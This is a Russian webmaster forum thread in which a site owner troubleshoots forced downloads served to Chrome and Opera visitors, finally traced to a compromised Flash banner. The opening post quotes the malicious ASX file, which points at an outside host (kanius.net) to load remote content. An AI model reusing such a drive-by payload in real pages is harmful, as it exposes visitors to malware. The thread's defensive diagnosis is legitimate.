вирь/троян/фрейм - помогите найти косяк.

4F
На сайте с 13.01.2008
Offline
144
845

Добрый вечер.

Сегодня пользователь написал о нахождении некой непонятной негативной хрени происходящей с сайтом. Отдельно отмечу, что данный косяк виден только в гугл хроме. Суть:

Есть приличный сайт, вот этот, при заходе на который через гугл хром происходит автоматическое скачивание файла вида

ebc46731d4d7fd89f4a92a0ad2bc93f9.php

При этом название файла как я понял делает рандомным (если вы зайдёте на сайт через гугл хром, вам будет предложено скачать файл с другим названием).

Внутри данного файла есть следующий код:

<ASX version = "3.0">

<PARAM name="HTMLView" value="http://kanius.net/zl/29657de9c85d6fd7ea0ddb580e756c2d.php?showuser=25737385&view=Chrome&showforum=s1"/>
<TITLE>Hello World!</TITLE>
<AUTHOR>Rasmus</AUTHOR>
<ENTRY>
<REF HREF="http://kanius.net/zl/2f17e6f6aebb2496b3823f7159fe74a5.php" />
</ENTRY>
</ASX>

В других браузерах такого не происходит. Код сайта был мной просмотрен и ничего криминального не обнаружено. Есть один фрейм - это фрейм чата, который стоит уже наверно год. Все скрипты в шапке мне известны и стояли уже давно, в футере только аналитикс и метрика.

Не смотря на то, что скачивание данного файла ни чем не вредит ни пользователю, ни мне - такое поведение сайта само по себе аномально. Буду очень признателен людям, которые либо сталкивались с подобным, либо имеют представление о решении проблемы и отпишутся в этой теме.

P.s.

Возможно в коде есть что-то, что я не заметил и в этом и есть косяк, возможно что-то подгружает данный файл со сторонних ресурсов, возможно ещё что-то. Все места, которые мне известны и факторы из-за которых такое могло бы происходить я проверил, и вроде как всё в норме... Но что-то явно не так.

4fun.fantasy добавил 04.08.2010 в 00:20

Тому, кто найдёт косяк и скажет как его исправить подарю ссылку с сайта навсегда (или просто перечислю 10$, если ссылка вам не подойдёт).

firefox19
На сайте с 05.11.2009
Offline
34
#1

зашел по адресу первый раз, вбив наугад http://kanius.net/zl/q.php и увидел там шифрованный JS-код. Потом ссылка стала недоступна. Кстати ответ на:

В других браузерах такого не происходит.

Подозреваю что это способ "угона" сессий.

firefox19 добавил 04.08.2010 в 00:27

п.с.: проверьте свой htaccess и 404-й файл на подозрительные элементы. Ну и искать следует в файлах, не совпадающих по дате изменения с остальными. Больше, не видя ФТП, сказать нечего.

Ваши идеи - наша работа (http://yaweb.ru) Продам Сайт агентства недвижимости (/ru/forum/561489)
4F
На сайте с 13.01.2008
Offline
144
#2

Я ошибся, в Опере люди сказали таже стория, в ff у меня такого не происходит.

firefox19:
проверьте свой htaccess и 404-й файл на подозрительные элементы

Проверил - всё в норме (ну по крайней мере криминального ничего я не увидел).

firefox19:
Ну и искать следует в файлах, не совпадающих по дате изменения с остальными

Из корня сайта - все файлы имеют дату изменения до 31 июля. Вирь (или что это я хз) появился только сегодня (точнее сказать вчера - 3 августа).

tester999
На сайте с 21.10.2004
Offline
149
#3

Зашел из хрома (версия 3.0.195.38).

Ничего не загрузилось. ((

P.S. верстка страшная

RO
На сайте с 13.07.2009
Offline
88
#4

не знаю как с хрома а меня с оперы начало перекидать на гугл, а потом и вовсе опера вылетела.

tester999
На сайте с 21.10.2004
Offline
149
#5

Зашел под оперой. Версия 9.80. Никаких закачек. Под оперой и верстка лучше смотрится.

Для чистоты эксперимента зашел под лисой (версия 3.6). Все в порядке.

Видно у меня комп глючит... У всех проблемы, у меня - нет.

4F
На сайте с 13.01.2008
Offline
144
#6
RedOK:
не знаю как с хрома а меня с оперы начало перекидать на гугл, а потом и вовсе опера вылетела

Тоесть при заходе на сайт шел редирект на гугл.ру?

В целом, сейчас, волшебным образом всё пропало и стало на свои места. Ни под каким браузером ничего не скачивается - как будто ничего и не было... И это настораживает.

4fun.fantasy добавил 04.08.2010 в 19:59

Вобщем проблему решили. Это была какая-то хрень в баннере (флеш), при загрузке которого шло обращение к сайту из первого поста. Сняли баннер - всё стало в норме. Если открыть один этот баннер в браузере - получаем ту же фигню что в старте темы.

Тему можно закрывать.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий